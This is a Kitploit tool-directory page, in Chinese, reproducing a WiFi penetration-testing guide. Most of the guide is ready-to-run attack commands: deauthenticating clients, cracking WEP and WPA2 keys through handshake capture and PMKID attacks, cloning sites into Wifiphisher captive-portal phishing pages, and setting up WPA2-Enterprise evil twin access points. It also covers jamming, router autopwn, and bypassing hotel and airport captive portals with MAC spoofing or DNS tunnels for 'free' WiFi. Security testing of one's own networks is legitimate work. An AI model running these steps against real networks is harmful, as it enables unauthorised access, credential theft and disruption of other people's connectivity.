Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wifi-pentesting-guide — WiFi渗透测试指南 | Kitploit
工具/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
密码破解Wi-Fi审计信息收集后渗透利用无线安全渗透测试社会工程学学习与教育
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

WiFi渗透测试指南

查看仓库
7341132年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

WiFi 渗透测试指南

目录

  1. 基本命令

  2. 开放网络

    2.1. 认证门户

    2.2. 中间人攻击

  3. WEP 破解

    3.1. 无客户端

  4. WPA2-PSK 破解

    4.1. 破解四次握手

    4.2. PMKID 攻击

    4.3. 无 AP 攻击

  5. WPA2-企业版

    5.1. 伪造接入点

    5.2. 暴力破解

    5.3. 支持的 EAP 方法

  6. 其他攻击

    6.1. Krack 攻击与 Frag 攻击

    6.2. OSINT

    6.3. WiFi 干扰

    6.4. 其他框架

  7. 后渗透

    7.1. 攻击路由器

    7.2. 扫描器类型

    7.3. 欺骗



1. 基本命令

设置环境变量

root@kitploit:~
VARIABLE=value

检查接口模式

root@kitploit:~
iwconfig $IFACE

检查接口状态

root@kitploit:~
ifconfig $IFACE

设置监听模式

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

列出网络

  1. 设置监听模式

  2. 运行 Airodump-ng

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

解除认证

  1. 仅针对一个客户端
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. 针对一个接入点(即该 AP 中的所有客户端)
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

获取隐藏 SSID(有客户端时)

  1. 列出网络

使用 Airodump-ng 列出网络,获取 AP 的 MAC 地址 ($AP_MAC) 和一个客户端的 MAC 地址 ($CLIENT_MAC)。不要停止捕获。

  1. 解除认证

在另一个终端中,解除一个或所有客户端的认证。当 Airodump-ng 捕获到该网络的一次握手时,名称或 ESSID 会出现在第一个终端中:

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

获取隐藏 SSID(无客户端时)

  1. 列出网络

使用 Airodump-ng 列出网络,获取 AP 的 MAC 地址 ($AP_MAC)。不要停止捕获。

2.a. 执行字典攻击

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. 或执行暴力攻击

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

字符集可以使用 l(小写字母)、u(大写字母)、n(数字)、c(小写+大写)、m(小写+大写+数字)或 a(所有可打印字符)。



2. 开放网络

2.1. 认证门户

2.1.1. 伪造认证门户

  1. 使用 HTTrack 克隆一个网站

  2. 安装 Wifiphisher。将 HTTrack 的结果放入 wifiphisher/data/phishing-pages/new_page/html 的新文件夹中,并在 wifiphisher/data/phishing-pages/new_page/config.ini 中创建配置文件。

  3. 使用 python setup.py install 或 bin 中的二进制文件重新编译项目。

  4. 安装 hostapd 后,以下命令在最新的 Kali 版本中正常工作:

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. 绕过方法 1:MAC 欺骗

绕过认证门户的第一种方法是将自己的 MAC 地址更改为已认证用户的 MAC 地址

  1. 扫描网络并获取 IP 和 MAC 地址列表。可以使用:
  • nmap

  • 自定义脚本,如 这个(Bash)或 这个(Python)

  1. 更改你的 IP 和 MAC 地址。可以使用:
  • macchanger

  • 自定义脚本,如 这个(Bash)

此外,还可以使用自动化脚本,例如:

  • Poliva 脚本

  • Hackcaptiveportals


2.1.3. 绕过方法 2:DNS 隧道

第二种方法是创建 DNS 隧道。为此,需要拥有一个可访问的 DNS 服务器。可以使用此方法绕过认证门户,在酒店、机场等地方获得“免费”WiFi。

  1. 检查域名是否能解析:
root@kitploit:~
nslookup example.com
  1. 创建 2 条 DNS 记录(在 Digital ocean、Afraid.org 等平台上):
  • 一条“A 记录”:dns.$DOMAIN 指向 $SERVER_IP(例如:dns.domain.com 139.59.172.117)

  • 一条“NS 记录”:hack.$DOMAIN 指向 dns.$DOMAIN(例如:hack.domain.com dns.domain.com)

  1. 在服务器上执行
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. 在此处检查是否正常工作

  2. 在客户端上执行

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. 创建隧道
root@kitploit:~
ssh -D 8080 [email protected]

2.2. 中间人攻击

一旦进入网络,可以测试其是否易受中间人攻击。

  1. 使用 Ettercap 进行 ARP 欺骗攻击

  2. 使用 Wireshark 或 TCPdump 嗅探流量

  3. 使用 PCredz(Linux)或 Network Miner(Windows)分析流量



3. WEP 破解

  1. 开始捕获
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. 使用 伪造认证 + ARP 请求重放攻击 + 解除用户认证 来加速 IV 收集。当 Airodump 收集到约 100,000 个不同的 IV 时停止。
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. 使用 Aircrack-ng 破解密码
root@kitploit:~
aircrack-ng $PCAP_FILE


4. WPA2-PSK 破解

4.1. 破解四次握手

  1. 开始捕获
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. 解除一个用户的认证。当看到消息 'WPA handshake: $MAC' 时停止 airodump 捕获。
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. 选项 1:使用 Aircrack-ng 破解握手
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

可以从这里获取字典。

  1. 选项 2:使用 Pyrit 破解握手
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID 攻击

可以使用这个脚本或按照以下步骤:

  1. 安装 Hcxdumptool 和 Hcxtool(可以使用这个脚本)。

  2. 停止网络管理器

root@kitploit:~
airmon-ng check kill

3a. 如果要对特定 MAC 地址进行攻击

  • 创建一个文本文件 ($FILTER_FILE) 并添加不带 ":" 的 MAC 地址。可以使用 sed 并将输出重定向到文件:
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • 捕获 PMKID
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. 创建 $HASH_FILE
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

每行的结构为:PMKID * 路由器 MAC * 站点 * ESSID(检查:https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. 使用 Hashcat(选项 16800)破解
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. 无 AP 攻击

如果你能访问一个客户端设备,该设备 Wi-Fi 已开启但周围没有网络,你仍然可以攻击该网络,前提是客户端设备之前连接过该网络。

为此,你需要使用 hostapd 创建一个伪造接入点,配置文件类似这个,使用任意密码但保持相同的网络名称。创建伪造网络后,客户端设备会尝试连接,你就能像本指南 4.1 节 那样获得四次握手。



5. WPA2-企业版

5.1 伪造接入点

虚拟机下载

本地安装

如果你不想使用虚拟机,可以通过以下方式安装所有内容:

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd & Freeradius-wpe

启动接入点:

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

当客户端连接时,使用以下命令读取日志:

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 暴力破解

  • Airhammer

5.3 支持的 EAP 方法

查找支持的 EAP 方法

  • EAP_buster


6. 其他攻击

6.1. Krack 攻击与 Frag 攻击

这两个高级攻击由伟大的 Mathy Vanhoef 发现:

  • Krack Attack 脚本 - 在此网站上解释

  • Frag Attack 脚本 - 在此网站上解释

6.2. OSINT

  • Wigle

6.3. WiFi 干扰

  • Wifijammer - 此程序可以向 AP 和客户端发送解除认证数据包。

例如,以下命令可以解除除伪造接入点外所有设备的认证:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. 其他框架

Linux:

  • Sniffair
  • Wifi Pumpkin - 流氓 WiFi 接入点攻击框架
  • Eaphammer - 伪造接入点框架
  • WEF - 针对 WPA/WPA2 和 WEP 的不同类型攻击框架,自动哈希破解等

Windows:

  • Acrylic - 适用于侦察阶段
  • Ekahau - 适用于 Wi-Fi 规划
  • Vistumbler - 适用于战争驾驶


7. 后渗透

一旦连接到网络

7.1. 攻击路由器

  • Routersploit - 嵌入式设备利用框架 - 测试 "use scanners/autopwn"

7.2. 扫描器类型

  • Nmap/Zenmap - 安全扫描器、端口扫描器和网络探测工具

  • Masscan - Nmap 的更快版本(可能破坏某些东西,请小心)

  • Netdiscover - ARP 嗅探。当网络分段非常严格时非常有用

7.3. 欺骗

  • Ettercap - 检查是否可以进行 MitM 攻击并嗅探网络中的所有流量
下载工具
操作系统平台凭据大小链接
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 GBMEGA
Kali 2019.1VMwareroot:wifi4.99 GBMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 GBMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 GBMEGA